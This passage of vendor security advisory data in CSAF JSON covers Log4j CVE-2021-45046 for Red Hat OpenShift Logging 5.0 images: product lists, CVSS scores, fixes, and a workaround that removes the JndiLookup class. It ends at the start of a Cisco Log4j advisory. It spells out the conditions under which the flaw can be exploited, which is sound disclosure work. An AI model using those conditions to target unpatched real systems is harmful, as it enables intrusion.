"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", 
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", 
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": 
"2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", 
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true`) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", 
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", 
"8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": 
"https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:36:36+00:00", "details": "For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nFor Red Hat OpenShift Logging 5.0, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5137" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", 
"8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", 
"8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-operator-bundle@sha256:8506f609ee7aae7006f856c9aea1868adbe0689e142d88a7db9fe1a5178f3178_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:177037cc7dd2abedf432efd6addf9d47960d8e9fb116cdfc973ee4999a488383_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa5bbc1b0792179d50e7e102588195b0b11799b94640db5039ff371e8505e32b_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/cluster-logging-rhel8-operator@sha256:aa89345bb6281fac7c35d404a2ff753bff3f222557ab6f03c2c401107adf073e_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-operator-bundle@sha256:4edb9f0a5efe40bdb5ae5f9b68abb4ac952810d1333442993c90bee6831bbe64_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:70fb7698de4592d07001b268b914f468c03618471cb975b6a21c35451999be2a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:c1dd73551aa53acb75a02875449fa54a995df5888b68421a7e945862a98aa8c2_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-proxy-rhel8@sha256:cf7da672fc4e59894230852c0d5e67e3fcbbcce1fa992784b5348e654ff59417_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:4bba1d96440b7fc19cb61fdacad24bfab5fab610eae01374d830ee51fa8a6bd4_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:71bcbfb03b820d0a2ce7fb5ec6ab4830b2d38ff62ccdcf974139a7244cf5b2ee_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch-rhel8-operator@sha256:97bd3a7bf854f3b4ead46336683a82853f78df95c48ab9a4f1c5164105f05f8e_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:8612f54b6b077febf9ab833b6bf6fe4673bc29ed8765323e60c4b7531ef40407_s390x", 
"8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:a70f88abff582e94a56f650acb782217e6247dc13343d7803492467a4881a9b0_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/elasticsearch6-rhel8@sha256:c4fb65aaf2602f06b713da8e5b5674d880f57177510a533135cbb93c7e362eb9_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:09ba9e857b5ba3ac122d71b2c349ab8e13981c34268b6ec9c252519243f77d55_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:98092e9322efec21851e728e69e1b32b7607a4aedccc9ec39fc225849f3b7e1a_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/eventrouter-rhel8@sha256:abf4052884464d6fa82d2b4aed5a612918d395f4229dde26a3c3acfa20fbfb34_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:3273f04559882c0ab7c2b61da96aa7a61f0004d1c87e8070477ba984cfa3dc50_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:77489c11265b4890c23c95b3bb255f707e9bfe02475a65e566fae1d1eb0ca970_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/fluentd-rhel8@sha256:a88c38034287123710fbdfa23056a700dbf918fa563d6ce14c56c99a14000a5c_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:7709829dde3568c1e32b4e949054191166545e724803341e4182e080583adbc8_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:d505ef5c45463c45c6bd67873ef038400b79b940ab142153ebdc86d6efdfb619_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/kibana6-rhel8@sha256:e3d3cba918b8eb95f340e1a6d5a2bc05bb93b6b305a0beccae0b5d37a064986a_ppc64le", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:4b597b22e6dbf1897e728d8384a7fb6f703290a6b4f9755141a9bd35569c1bb4_amd64", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:680699c945e150eb6fdbd0dd70565ad279fba8c21abbffe1fa7b3a0360f03178_s390x", "8Base-OSE-LOGGING-5.0:openshift-logging/logging-curator5-rhel8@sha256:6a3e0dcfc27c799d54b9b86d71b61691583d48b71b1f651afb46ae5b00a31ba1_ppc64le" ] } ], "threats": [ { "category": 
"exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
cisco-sa-apache-log4j-qruknebd
Vulnerability from csaf_cisco
Notes
{ "document": { "acknowledgments": [ { "summary": "These vulnerabilities were disclosed by the Apache Software Foundation." } ], "category": "csaf_security_advisory", "csaf_version": "2.0", "notes": [ { "category": "summary", "text": "Critical Vulnerabilities in Apache Log4j Java Logging Library\r\n\r\nOn December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed:\r\n\r\nCVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints\r\n\r\nOn December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:\r\n\r\nCVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack\r\n\r\nOn December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16 and earlier was disclosed:\r\n\r\nCVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation\r\n\r\nOn December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17 and earlier was 